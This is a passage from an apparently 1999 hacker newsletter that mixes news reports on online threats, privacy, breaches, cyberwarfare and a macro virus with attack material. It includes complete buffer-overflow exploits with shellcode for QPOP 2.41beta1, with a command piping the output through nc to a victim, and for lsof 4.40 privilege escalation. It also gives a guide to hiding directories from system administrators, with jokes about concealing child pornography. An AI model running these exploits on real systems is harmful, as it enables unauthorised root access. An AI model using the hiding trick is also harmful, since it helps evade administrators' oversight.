Windows, which was designed with connectivity, not security, in mind -- and it's only a matter of time before someone far more skilled and sinister takes advantage of it again. "What protects us right now," Symantec's Nachenberg said, "are people's ethics." @HWA 10.0 Online Threats Labeled Cyberterrorism ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid A man in Missouri has had his computer confiscated and will have charges of making threats brought against him. This after he made threats against students and teachers at the Townsend's Hawthorne Brook Middle School in Massachusetts. Somehow this was described as a 'Cyberterrorist' act. (Threats on a playground are just threats, threats on the internet are suddenly cyberterroism.) Associated Press - Via AltaVista http://zip2.newsreal.com/cgi-bin/NewsService?osform_template=pages/altavistaStory&refresh=10800&ID=altavista&path=News/Story_1999_10_23.NRdb@2@23@3@63&headerID=1 Online Prowler Targets Mass. Teens Source: Associated Press BOSTON (AP) -- Officials say a 19-year-old quadriplegic from Missouri used an Internet chat room to make "Columbine-like" threats to hurt students and teachers at a Massachusetts middle school. Massachusetts Attorney General Tom Reilly said Saturday that the paralyzed teen -- whose name and hometown were not released -- made the threats using an America Online chat room frequented by dozens of eighth-graders from Townsend's Hawthorne Brook Middle School. Authorities confiscated the Missouri teen-ager's computer on Friday and plan to charge him with making threats and possibly other charges on Monday, Reilly said. He said the teen-ager had been chatting online with the Townsend students since September, but midweek, the cyber-relationship turned terrifying. Reilly said the man told several students he was in their community and he threatened to hurt them, their teachers and their school. The threats -- which included a list of teachers and students to be targeted -- was an act of "cyberterrorism" that left the school shaken. It may have been a hoax, but "the fear that was expressed by students, parents and teachers in this community was very real," Reilly said. Reilly said the students had thought the Missouri teen-ager was a peer and included him in their conversations, revealing information about their town, their school and themselves. When the man allegedly directed some students to child pornography Web sites a few days ago, some of the children told their parents, who then called police. Townsend Superintendent of Schools James McCormick said someone from the community also received a suspicious phone call that made references to the April 20 shootings at Columbine High School in Littleton, Colo., where two students shot and killed 12 students, a teacher and themselves. Bomb-sniffing dogs searched the middle school on Thursday, and students' bags and backpacks were checked, but nothing suspicious was found and school was declared safe, McCormick said. On Friday, authorities converged on the suspect's home, where he lives with his parents, and confiscated his computer equipment. Reilly said the teen-ager -- paralyzed from the neck down by a high school car crash -- admitted communicating with the Massachusetts students. Publication date: Oct 23 © 1999, NewsReal, Inc. 11.0 QPOP 2.41beta1 exploit (linux x86) by mastoras ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * QPOP 2.41beta1 exploit (linux x86) by mastoras * Some code ripped from "mount" exploit by Bloodmask and Vio * Assembly code changed so it is not affected by tolower() function. * * this one sucks (too), but works :> * (./qpop 997 4000; cat) | nc your_victim 110 * * 28 Jun 1998 * mastoras@hack.gr http://www.hack.gr/users/mastoras * Mastoras Wins! Fatality! */ #include #include #include #include #define DEFAULT_OFFSET 4000 u_long get_esp() { __asm__("movl %esp, %eax"); } int main(int argc, char **argv) { u_char execshell[] = "\xeb\x26\x5e\x8d\x1e\x89\x5e\x1b\x31\xed\x89\x6e\x17\x89\x6e\x1f" "\xb8\x1b\x76\x34\x12\x35\x10\x76\x34\x12\x8d\x6e\x1b\x89\xe9\x89" "\xea\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd5\xff\xff\xff" "/////////////////bin/sh"; unsigned long *addr_ptr = NULL; unsigned int ret_address; char *buff = NULL; char *ptr = NULL; int BUFFER_SIZE = 997; int ofs = DEFAULT_OFFSET; int nops = (300/4); int i; if (argc>1) BUFFER_SIZE = atoi(argv[1]); if (argc>2) ofs = atoi(argv[2]); buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; ret_address = get_esp() - ofs; for(i=0;i < (nops);i++) *(addr_ptr++) = ret_address; ptr = (char *)addr_ptr; *ptr = 0; fprintf(stderr, "length %d+%d+%d=%d, address=%x\n", BUFFER_SIZE,strlen(execshell),nops, BUFFER_SIZE+strlen(execshell)+nops, ret_address); printf("%s\n",buff); return 0; } @HWA 12.0 ls0f.c Vulnerable: linux machines running lsof 4.40 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * ls0f.c (c) 1999 Subterrain Security * Written by bind - 1999 * * Vulnerable: linux machines running lsof 4.40 * * Cheers to xdr & cripto... * * *Affected* * [ SuSE 6.0 + 5.3 ] * [ Debian 2.0 ] * [ Redhat 5.2 ] * */ #include #include #define LSOF "/usr/sbin/lsof" char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0" "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char **argv) { char code[2000]; char ret[28]; int offset, i; int len = strlen(shellcode); if(argc > 1) offset = atoi(argv[1]); for(i = 0;i <= 28;i += 4) *(long *)&ret[i] = (unsigned long) get_sp() - offset; memset(code, 0x90, 2000); memcpy(code+(2000 - len), shellcode, len); setenv("CODE", code, 1); execl(LSOF,"lsof","-u",ret,NULL); } @HWA 13.0 Free phone calls over the internet in the US ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by sAs- There is a new company offering free dialing using internet phone technology to make calls over the internet within the US. The catch: you have to be a US citizen (or at least provide US address details) and you have to fill out a standard marketting questionaire and include your email address. I filled out the form with false info and was allowed into the dialpad system. You will be asked to allow the site to install a new java applet on your computer, allow it to do so and the the dialpad applet will be installed automatically in Netscape (or MSIE) 4.5 / 5.0 or higher. From there on you have the dialpad and using a headset/with mic can dialout to any destination in the U.S. Have fun! http://www.dialpad.com/ @HWA 14.0 Are You a Cyberspace Addict? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench Internet-Computer Addiction Services is a Redmond WA counseling center that specializes in treating people who are addicted to being online. The founders Jay Parker, Hilarie Cash and others feel that online addiction is just as powerful as gambling, alcohol or drugs. Seattle Times http://www.seattletimes.com/news/local/html98/adix_19991024.html Posted at 01:22 a.m. PDT; Sunday, October 24, 1999 Center offers treatment for growing number of cyberspace addicts by Ian Ith Seattle Times Eastside bureau A 45-year-old corporate chief executive in Seattle finds himself locking himself in his office, holding all his calls and surfing the Internet for pornography for hours on end. A University of Washington student flunks out because he stays up all night - every night - playing online fantasy role-playing adventure games. A homemaker turns on the computer when the kids go to school. When they come home, she's still there, talking about sex with total strangers in an online chat room. "This is really happening, and it's pretty powerful stuff," said Jay Parker, an Eastside addiction counselor. "This does impact people's lives. They need to start figuring out ways to live with their computers and make it a healthy part of their lives." So Parker has teamed up with a colleague, psychologist Hilarie Cash, in opening Internet-Computer Addiction Services, a Redmond counseling center that specializes in treating people who just can't kick the online habit. And while some scholars say they doubt that computer obsession rises to the level of a true addiction on par with alcohol or drugs, Cash, Parker and a contingent of highly respected colleagues say it's just as harmful as gambling addiction, and just as costly. Some estimate that at least 10 percent of heavy Internet surfers are psychologically dependent on cyberspace and need professional help. "It's a growing thing," said Maressa Hecht Orzack, a Boston clinical psychologist and professor at the Harvard Medical School who is considered the leading expert on computer addiction. "It's a very isolating experience for many people. People who get into this situation will have tried to stop. But they tend to do it compulsively and they can't stop it." Parker and Cash collaborated after they met at a conference and debated the various methods of treating computer addiction. Both had seen a surge in the number of clients in their regular practices who were finding the Internet affecting their lives. But the idea of computer addiction is so new that there aren't any solid medical studies to support one method or another. In fact, the jury is still out on whether someone can actually be addicted to a computer or whether computer use is just a symptom of some other trouble. "There's no question that there's some people who are spiraling out of control," said Malcolm Parks, an assistant vice provost for research at the University of Washington. "The question, to me as a researcher, is what would they be doing if they didn't have the Internet. Would they spiral out of control in some other way? "It's a reach to say the technology is the cause of the addiction," he said. "Why not help them deal with the underlying issues?" But Cash and Parker say they have seen too many Internet tragedies to dismiss it. "The social consequences are enormous," said Cash, who has a doctorate in psychology and has treated patients for two decades. "When you neglect your spouse and develop serious marital problems, when your job is neglected, when your kids are neglected, these are serious consequences." The counselors acknowledge that there's no consensus on how to treat the problem. So they plan to conduct a scientific study of various methods. Parker thinks 12-step programs, similar to Alcoholics Anonymous, is the most effective. Cash will focus on a more traditional counseling approach. Which technique clients will use will depend on their individual circumstances. While temporarily abstaining from computer use is likely to be necessary to break the habit, both counselors acknowledge that computers are too ingrained in our world for users to become cyber-teetotalers. "The goal is to have them use the computer the same way a food addict still needs to eat," Parker said. "Our first goal is to get them off the Internet, then our second goal is to address the underlying issues." And, the counselors hope, they can learn to be like the millions of Web surfers who don't let it rule their lives. "They find a way to balance it in their lives," Cash said. "That's the difference between someone who becomes an addict and those who don't. "But there really are people who don't have any apparent pre-existing problems, and they get hooked. It's something we don't fully understand. But it happens. It's a technology that is just powerful." @HWA 15.0 Congressman Lobbies IETF For Privacy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Oblivion Representative Bob Barr (R-Georgia) has sent a letter to the chairman of the Internet Engineering Task Force supporting freedom and privacy. He urged the IETF not to assist law enforcement by providing a surveillance architecture in the new Internet technology. The FBI has requested that such technology be built into the new technology to aid in legal wiretaps. Wired http://www.wired.com/news/politics/0,1283,32100,00.html 'Don't Help the Snoops' by Declan McCullagh 10:45 a.m. 25.Oct.99.PDT The Internet's standards body should not craft technology to aid government surveillance, a prominent conservative congressman says. Representative Bob Barr (R-Georgia) said that there is no reason for the Internet Engineering Task Force to support wiretapping in the next generation of protocols and that doing so would be "dangerous." "For the sake of protecting freedom, commerce, and privacy on the Internet, I urge you to draw the line firmly and early, by immediately rejecting any attempts to force a cumbersome, expensive, and dangerous surveillance architecture on the Internet," Barr wrote in a letter to IETF chairman Fred Baker. Next month, the IETF will decide whether to support government surveillance in the protocols that computers connected to the Internet use to communicate. The FBI has said those standards should support lawful wiretaps. Barr predicted that if the IETF complies with the FBI's wishes, privacy would be endangered online through back doors in products, law enforcement would be emboldened and demand even more access, and the costs to consumers would rise. Since his election in 1994, Barr has become a prominent privacy advocate in Congress, frequently siding with the ACLU and denouncing expansions of government power such as FBI demands for "roving" wiretaps. Best known for demanding Clinton's impeachment even before the Lewinsky scandal, Barr has also fought against same-sex marriages and drug legalization. While Barr's letter is intended to signal that Congress is interested in what has been an internal IETF debate -- and may be the first time that a legislator has ever weighed in on one -- it could have limited impact. The IETF is an international standards-setting body that has long prided itself on being above parochial, national concerns. Then again, say law enforcement agents, nations have required their telephone companies to support wiretapping, and may require Internet companies to buy snoopable products as more communication takes place online. "I'm not aware of any country that does not allow for the use of electronic surveillance," an FBI spokesman told Wired News. "This is an issue that has no country bounds." In discussions on an internal IETF mailing list, some proponents of readily-available wiretapping have said that a 1994 law called the Communications Assistance to Law Enforcement Act, or CALEA, may require Net-telephony companies to support surveillance. "In my opinion, Internet telephony in its current form falls far short of the statutory definitions in CALEA," Barr said. "Furthermore, based on Congress' intent to do nothing more than maintain the status quo by enacting CALEA, it is questionable whether Internet telephony could ever be appropriately included under the Act's mandates." Barr indicated he would consider introducing legislation to block the Clinton administration from making any such demands. @HWA 16.0 The King Of Hidden Directories by Zym0t1c ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Note: This works in *NIX as well, it has been used by warez groups for years to hide warez sites on public servers, but this info is still useful for the average joe that wants to hide stuff from over zealous sysadmins - Ed Contributed by Zym0t1c The KING of Hidden Directories Oct, 18th 1999 - ... Screwing around at school... If our sysops (relying on NT4) detect any hidden directory, not owned by them, they simply delete it. "They don't like anyone having secrets," was their reason... Sympathetic he? So, I was playing with the little hidden directories trick I've read about some time ago (downloaded from The HackerZ Hideout, http://www.hackersclub.com/km, called 'REAL Hidden Directories' - DOS Trick by kM & mR.dISCO) The following lines are taken from that file. /******************************** CUT HERE ********************************/ '... In DOS there are 256 characters (i.e. letters, numbers and symbols numbered 0-255). Look in the back of any DOS manual to find these. When you hold down the ALT key and type the ASCII code from the number pad it will print it to the screen. For example ALT (155) is ¢ and ALT (129) is ü. However, ALT (255) is the NULL character (it is true nothingness). If you create a directory using ALT (255), it will appear to have no name, but... =)...' /******************************** CUT HERE ********************************/ So, right now everyone can create a *REAL* hidden directory... :) I suggest every newbie (what the hell! I suggest everybody! :)) reading that article since it's so simple and useful... Just grab it at 'http://hackersclub.com/km/newbies/dostrick.txt'. (Appended to this article - Ed) Conclusion of today's classes: I've found one directory which is totally hidden! You know that when you create a subdirectory, assuming you use a DOS shell, two directories are created, named '.' and '..'. You can check this by looking at the date and time of creation. The . directory is the current one and the .. directory is used for going one up. So, what if one created a directory called '..ALT (255)', i.e. '.. '? When you check it, you receive a second .. directory. When the sysops see this, they will get suspicious thinking they've never seen this in their entire lives! A directory with two .. directories! :)) Am I going crazy? Then, going to explorer, I saw that the directory was not listed, although it wasn't hidden. In DOS, it was listed like any regular .. direcory. So, using the attrib +h ..ALT (255), it dissapeared in DOS. Using the Show all files (hidden also) option in explorer, it still wasn't listed. Found it! The KING of hidden directories in DOS, Win95 OSR1, NT3.51 and NT4!!! (and UNIX - Ed) The negative part is that you can find the directory using the find command, hidden or not. But, you must admit that a sysop must really know what he is looking for, going through all that trouble just for finding that one directory... Also, when you deltree the directory above (where this hidden directory was created in), it also is removed. So, when you use this trick, use it in a directory where the sysops won't think to find anything. Let's say... \%systemdrive%\system32\ or something similar (if you've got write access). Remarks: o I've tried many directories (the class was really boring) using one point with ALT (255), two points and many many other combinations, but this one was the only *REAL* hidden directory... o Create it under the root directory and hide it for a little fun... If the sysops don't know much of the ASCII table and the combinations used by DOS commands (use of asterisks, ...), they won't be able to delete it easy. BTW: NT 4 doesn't recognize the deltree command. Everyone knows this, but just in case you don't: why don't you create a whole tree of such directories under the root? :) o Hide it always (attrib +h ..ALT (255)), so the directorie becomes never listed and keep your files away from those ?*%!!!%ckers. :)) o I tested it also under Win98 and the directory was listed as a ~1 directory, both visible under explorer and DOS... Win95 OSR2 and 98 SE will also list it (I think). So, this trick is dead using these versions and probably the next generation of Microsoft OS'ses. o Still, you must admit, this one is nice, isn't it? :)) Zym0t1c, @HWA 17.0 The Hidden Directories text referred to in 16.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ REAL Hidden Directories DOS Trick by kM & mR.dISCO 03/25/97 (screwing around at work) - This is old but newbies need to know about it - Another Original from the HackerZ Hideout www.hackersclub.com/km ====================== OK here is a trick that you can do with your DOS/Windows3.x and Windows 95 machine that works. If you use Windows NT 3.51/NT4.0 or Win95 OSR2 w/FAT 32 this little trick doesn't work. It only works on people who don't know DOS and the ASCII table. Use at your own risk! If you're trying to hide kiddie porn from the feds and get busted its not our fault! Maybe we will do another revision of this that will be more malicious to the end user with this hack. I'm sure if you play with it long enough and read your DOS manual maybe you can guess what we are thinking. Send us your own ideas about this trick...we will publish them here if they are good. ====================== What it Does: This trick can be used to hide data on a computer in a directory. Unless you know how to change to the directory manually you won't be able to access it. (meaning Windows File Manager and Windows Explorer although it sees it, it can't access it). Why it Works: In DOS there are 256 characters (i.e. letters, numbers and symbols numbered 0-255). Look in the back of any DOS manual to find these. When you hold down the ALT key and type the ASCII code from the number pad it will print it to the screen. For example ALT (155) is ¢ and ALT (129) is ü. However, ALT (255) is the NULL character (it is true nothingness). If you create a directory using ALT (255), it will appear to have no name, but...=) NOTE: You will not have the access to the full character set unless ANSI is loaded. Look in your DOS book, or in WIN 95 help to do this. How to Do It: Goto DOS and do these commands C: cd\ md {hold ALT (on your numberpad only)} 255 <- this is an ASCII NULL Character cd ALT 255 and put something in there -=> If you want to be cruel and evil do something stupid like "ALT-255xxxpics" on a computer at a local CompUsa. See if the idiots could delete the directory or see if there are actual XXX Pics in there. Limitations: This can only be created in DOS or a DOS window. If you create this in explorer or file manager it will let you access the directory. What the Average User Sees: To test it...go into windows File Manager or Explorer...you will see a C:\_ directory...when you double click it will say : " c:\_ not accessible. This Folder was moved or removed" Heheh...If you really want to be bad ATTRIB the directory +H so no one in DOS can see it. Updated on 6/30/97... An Email I received by Gizmo Subject: Limitations using 255 Date: Mon, 30 Jun 1997 01:01:18 -0500 I was just messing around and found the neat dos trick. Not that it really matters but another limitation of the trick is that if the "special directory" is a subdirectory then you can just use "deltree" on the parent directory. Here's an even simpler method... Say you make a directory called "trick" inserting the null character in front. Just type "deltree *trick". And it's gone! =============================================================================================== Why should I use this? - Good for kids who want to hide porn from mommy and daddy! - If your a tech support person you know how lame users can be. This is handy for making backups of configurations and covering your ass. - Its probably also good to pull batch file pranks and such on unsuspecting lamers that use the 16 bit file manager in Windows 95. (that one was for you Wyle) Its a small hack...but its for newbies who need to learn even the littlest of things count. If you have a small hack you think newbies should know please send it to km@hackersclub.com REAL Hidden Directories DOS Trick by kM & mR.dISCO 03/25/97 (screwing around at work) - This is old but newbies need to know about it - Another Original from the HackerZ Hideout www.hackersclub.com/km ====================== OK here is a trick that you can do with your DOS/Windows3.x and Windows 95 machine that works. If you use Windows NT 3.51/NT4.0 or Win95 OSR2 w/FAT 32 this little trick doesn't work. It only works on people who don't know DOS and the ASCII table. Use at your own risk! If you're trying to hide kiddie porn from the feds and get busted its not our fault! Maybe we will do another revision of this that will be more malicious to the end user with this hack. I'm sure if you play with it long enough and read your DOS manual maybe you can guess what we are thinking. Send us your own ideas about this trick...we will publish them here if they are good. ====================== What it Does: This trick can be used to hide data on a computer in a directory. Unless you know how to change to the directory manually you won't be able to access it. (meaning Windows File Manager and Windows Explorer although it sees it, it can't access it). Why it Works: In DOS there are 256 characters (i.e. letters, numbers and symbols numbered 0-255). Look in the back of any DOS manual to find these. When you hold down the ALT key and type the ASCII code from the number pad it will print it to the screen. For example ALT (155) is ¢ and ALT (129) is ü. However, ALT (255) is the NULL character (it is true nothingness). If you create a directory using ALT (255), it will appear to have no name, but...=) NOTE: You will not have the access to the full character set unless ANSI is loaded. Look in your DOS book, or in WIN 95 help to do this. How to Do It: Goto DOS and do these commands C: cd\ md {hold ALT (on your numberpad only)} 255 <- this is an ASCII NULL Character cd ALT 255 and put something in there -=> If you want to be cruel and evil do something stupid like "ALT-255xxxpics" on a computer at a local CompUsa. See if the idiots could delete the directory or see if there are actual XXX Pics in there. Limitations: This can only be created in DOS or a DOS window. If you create this in explorer or file manager it will let you access the directory. What the Average User Sees: To test it...go into windows File Manager or Explorer...you will see a C:\_ directory...when you double click it will say : " c:\_ not accessible. This Folder was moved or removed" Heheh...If you really want to be bad ATTRIB the directory +H so no one in DOS can see it. Updated on 6/30/97... An Email I received by Gizmo Subject: Limitations using 255 Date: Mon, 30 Jun 1997 01:01:18 -0500 I was just messing around and found the neat dos trick. Not that it really matters but another limitation of the trick is that if the "special directory" is a subdirectory then you can just use "deltree" on the parent directory. Here's an even simpler method... Say you make a directory called "trick" inserting the null character in front. Just type "deltree *trick". And it's gone! =============================================================================================== Why should I use this? - Good for kids who want to hide porn from mommy and daddy! - If your a tech support person you know how lame users can be. This is handy for making backups of configurations and covering your ass. - Its probably also good to pull batch file pranks and such on unsuspecting lamers that use the 16 bit file manager in Windows 95. (that one was for you Wyle) Its a small hack...but its for newbies who need to learn even the littlest of things count. If you have a small hack you think newbies should know please send it to km@hackersclub.com @HWA 18.0 Cable + Wireless Security Compromised ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lady Sharrow Cable & Wireless Communications, a major ISP in England, has had its security breached. A database containing the personal information of 150,000 users was reportedly compromised. The database included e-mail addresses, passwords and telephone numbers. Cable & Wireless is unsure how the breach occurred but is investigating. UK Telegraph http://www.telegraph.co.uk/et?ac=001576828917683&rtmo=qudtuRt9&atmo=9999LpL9&pg=/et/99/10/25/nhack25.html Hacker spins a worldwide web of security fears By Sally Pook CONCERNS about the security of the internet deepened yesterday after a hacker claimed to have broken into a database containing the personal details of more than 150,000 users. Cable & Wireless Communications promised an immediate investigation into what appeared to be a "very serious breach of security". The hacker claimed to have used the information, including e-mail addresses, passwords and telephone numbers, to break into the web sites of 100 users yesterday. He said he did it to expose poor security at Cable & Wireless Communications, a subsidiary of the telecoms group. Clifford Longley, a columnist with The Daily Telegraph, found all his files had disappeared from his web site. He said: "All my articles had been deleted. I rang a helpline and the person on the telephone just said 'Oh my God'." Mr Longley was greeted by a notice on his web site from the hacker saying: "Looking for your homepage? It has been taken off the server. Nothing personal but this has been done to expose Cable & Wireless's poor security." The hacker claimed he had broken into a "normal" internet site containing details of more than 150,000 customers and said he had revealed the web address. Yesterday, a spokesman for Cable & Wireless Communications said: "We don't know why this has happened or how but we will investigate it as soon as possible. Customers' details are kept on an internal system, but if these claims are true, we will have to look at how these details got on to the internet." Two months ago, Hotmail, one of the biggest e-mail providers, was closed by its operator Microsoft after a security breach allowed anyone to read subscribers' messages. @HWA 19.0 Yugo Cyber War Not As Widespread As First Thought ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Recent statements by high level military officials regarding the use of electronic techniques during the US - Yugoslavian war have increased conjecture as to what actually occurred. Rumors have spread about everything from implanting viruses to draining bank accounts. However, according to the commander of U.S. air forces in Europe cyber attacks were mainly focused on military air defense systems. This article goes on to explore the legal aspects of attacks on other countries computer systems and claims that Operation Uphold Democracy in Haiti in 1994 was the first American penetration of foreign computer networks. Washington Post http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm The Cyber Bomb in Yugoslavia By William M. Arkin Special to washingtonpost.com Monday, October 25, 1999 Gen. Henry Shelton, chairman of the Joint Chiefs of Staff, told reporters Oct. 7 that the United States waged information warfare as part of the NATO bombing campaign earlier this year. His confirmation fueled media conjecture that American hackers plundered Yugoslav bank accounts and took other Clancy-esque actions against Slobodan Milosevic's networks and infrastructure. But I have learned from high-level Defense Department sources that the U.S. did not penetrate any banking networks. What is more, the Pentagon's own top legal office believes that such attacks may be unlawful. Operations against Yugoslav computer systems were focused on military air defense systems. Gen. John Jumper, commander of U.S. air forces in Europe, confirmed this to Aviation Week and Space Technology in August. Concerns about international legal constraints on electronic information warfare have so far deterred American government hackers from exercising their full capabilities. Moreover, the Pentagon says it is hampered by a lack of a national information operations vision and strategy. "The conduct of an integrated campaign was delayed by the lack of both advance planning and strategic guidance defining key objectives," its Kosovo after-action review released this month says. Have Your Lawyer Call My General While bombs were falling in Yugoslavia, the Pentagon Office of General Counsel finished a 50-page internal "Assessment of International Legal Issues in Information Operations." Though it notes that it is "by no means clear what information operations (IO) techniques will end up being considered to be 'weapons'" in the eyes of the international community, the traditional law of war applies to military-inspired "computer network attack." "Offensive IO are governed by the same legal principles" that govern the use of force, according to retired Marine Corps lawyer Walter "Gary" Sharp, Shelton's former deputy legal counsel responsible for information war. These include maintaining the distinction between combatants and noncombatants, and the doctrine of military necessity. "What we cannot do kinetically we cannot do electronically," Sharp says. Accordingly, the Pentagon's May assessment states that "stock exchanges, banking systems, universities, and similar civilian infrastructures may not be attacked simply because a belligerent has the ability to do so." Under the principle of military necessity, to go after Milosevic's and his cronies' bank accounts, whether with bombs or bits, requires that "the attacking force can demonstrate that a definite military advantage is expected from the attack." Noting the "current formative period" of information warfare, the Pentagon appraisal warns of the possibility that "efforts will be made to restrict or prohibit information operations by legal means." Your Wish is Our Command Knowledgeable military sources say that Yugoslavia is not the first American penetration of foreign computer networks. Computers were broken into and exploited during Operation Uphold Democracy in Haiti in 1994, according to sources. President Clinton personally approved the operation. Since Haiti, these same sources said, a number of "relatively low key" computer exploitations have accompanied other peacekeeping operations. Many of these have been little more than high-tech intelligence collection missions. In many other cases, says one insider, the Joint Staff office of "special technical operations" prepared "approval packages" for the Secretary of Defense and the President, but the "process took so long the operations were overtaken by events and we didn't engage in them." System Access To What End When Yugoslavia turned into a hot war, air planners at U.S. European headquarters worked in San Antonio with the Joint Command and Control Warfare Center (JC2WC--known as "jake-wick" in the military) to devise a scheme to insert false messages and targets into the centralized air defense command network. But political hesitations in the approval process stood in the way of the operation beginning with the opening bombing salvos on March 24. A Top Secret U.S.-only operation to penetrate the Yugoslav air defense system was approved soon after the bombing began, Air Force sources say. Here would be the first test of a new weapon and capability in combat. At the same time though, NATO was surprised when Yugoslav radar operators did not turn on their systems. Evidently learning from Iraq, they kept a low "electronic profile," thus thwarting the traditional electronic attack with anti-radiation missiles and jammers. This was fortunate for the cyber-warriors, for it made a computer penetration all the more important if it could confuse or disable the network of surface-to-air missiles. But by the time all of the pieces of the information war were in place, enough physical damage had been done to Yugoslav bunkers and command lines, it became difficult to isolate and assess the impact of the cyber attack. For Gary Sharp and other legal specialists in this burgeoning field of information warfare, Yugoslavia merely stands as another demonstration that computer network attack will eventually become an integral part of the way warfare is waged. "We have not fully realized the breadth of the capabilities and the potential," Sharp says. The General Counsel report agrees. It concludes that there are "no show-stoppers in international law" for the types of information operations "as now contemplated" by the Pentagon as long as existing legal obligations are followed. The Counsel's report is silent on covert cyber-warfare that might be "contemplated" by other agencies. William M. Arkin can be reached for comment at william_arkin@washingtonpost.com © Copyright 1999 Washington Post.Newsweek Interactive @HWA 20.0 England To Launch High Tech Crime Unit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne Expected to be formed in London next year is an anti-computer crime team that will be composed of specialist police officers, security people from both the MI6 and MI5, and experts from academy and industry. This team will be called the "High Tech Crime Unit", the team will have units to cover various computer crimes that span from computer intrusion, pornography, counterfeiting, and fraud. The London Independent http://199.97.97.16/contWriter/cnd7/1999/10/25/cndin/8263-1466-pat_nytimes.html British Police Launch a Cyber Squad to Combat Internet Crime JASON BENNETTO c.1999 The Independent, London LONDON -- A national police squad is to be set up to tackle the growing menace of computer and Internet crime. A confidential police assessment shows that ``cyber-crime'' in Britain is growing -- it includes such activities as money laundering, pornography, counterfeiting, hacking, and fraud. The new computer crime team is expected to include experts from universities and the electronics industry, intelligence from the security services MI6 and MI5, as well as specialist police officers. The squad is expected to be based at the National Criminal Intelligence Service (NCIS) in London. Ministers have given their backing to the idea and the police intend to ask Home Office officials next month for extra funding for the project. The police have already taken advice from code-breaking experts at the National Security Agency, the American intelligence organization, and plan to exchange information with the FBI. The squad is expected to be called the ``High Tech Crime Unit'' and will have ``cells'' or specialist sectors to deal with different types of cyber-crime. They will cover a range of areas, which have been identified in a report by the Association of Chief Police Officers (ACPO), that include fraud, pornography, pedophile activity, spreading race hate, counterfeiting, gambling, hacking and stealing information, software piracy, money laundering, and sabotage involving computer viruses. The unit follows growing unease among chief constables and John Abbott, the director general of NCIS, about the growth in crime committed using computer systems and the Internet. Millions of pounds are lost every year as criminals switch from traditional methods of law-breaking to cyber offences where there are fewer risks of being caught. David Phillips, the chief constable of Kent and head of the ACPO's crime committee, said: ``Traditional crimes - deception, fraud, pornography, swindles of all kind - are taking place via the Internet. We have to go on the offensive as hunters in this sea of information. ``You have to go into deep battle and attack criminals whenever they surface.'' He argued that the lack of a specialist team meant that ``at present we are almost blind.'' He said: ``We recently had discussions with [computer experts from] the USA who told us they were dealing with millions of pounds of criminal transactions. They are just mind-boggling levels of crime.'' He added that the squad, which is likely to be set up next year, would link up with forces throughout the country. ----- (Distributed by New York Times Special Features) @HWA 21.0 First Project Macro Virus Discovered ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by nvirB Corner is suspected to be the first virus to infect MS Project files. This macro virus can travel between MS Word and MS Project. It does not have a malicious payload and does nothing but replicate. Corner even has a nice little poem at the end of its code. The poem is from Joy Division's song "Twenty-four hours", taken from their 1980 album titled "Closer". Data Fellows http://www.data-fellows.com/v-descs/corner.htm F-Secure Virus Information Pages NAME: Corner ALIAS: Project virus, P98M Corner is the first macro virus to infect Microsoft Project application. This virus infects both Project and Word and can travel between them. When an infected document is opened to Microsoft Word 97 or 2000, P98M/Corner.A checks if Microsoft Project is running. If it is, it gets infected. The Word part of the virus is a simple class infector. It spreads when an infected document is closed. At this time it sets the Office 2000 security settings to low, disables the "Tools/Macros" menu and turns off the macro virus protection. After that the virus replicates to all opened documents. Corner is not able to infect Microsoft Word 2000, unless the user has first changed the security settings to medium or low. To infect Project, the virus adds a new blank project and inserts the virus code to the "ThisProject" class module. When an infected document is opened to Microsoft Project 98, Corner.A infects Word application, even if it is not running. The MS Project part of the virus is not resident, and it does not infect the global project. The virus replicates during the project deactivation (after an infected project has been opened). The virus infects Word application by opening it and inserting the virus code in the global template's class module "ThisDocument". This process is hidden from the user and the user can't see the infection of Word. Corner.A virus contains the following comments at the end of its code: 'I never realized the lengths I'd have to go 'All the darkest corners of a sense 'I didn't know 'Just for one moment 'hearing someone call 'Looked beyond the day in hand 'There's nothing there at all 'Project98/Word97-2k Closer The text is from Joy Division's song "Twenty-four hours", taken from their 1980 album titled "Closer". Corner does not do anything but replicate. [Analysis: Katrin Tocheva and Sami Rautiainen, Data Fellows] @HWA 22.0 Microsoft Web Page Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue The web site for Microsoft's Conference Management Server was defaced late Sunday evening and was still not fixed over 24 hours later. The defacement consisted of two seperate index files and was not one of the main pages. This defacement joins several military severs that have recently been defaced including US Army Reserve Command, White Sands Missile Range, Navy Management System Support Office, Department of Veterans Affairs and others. Attrition Mirror 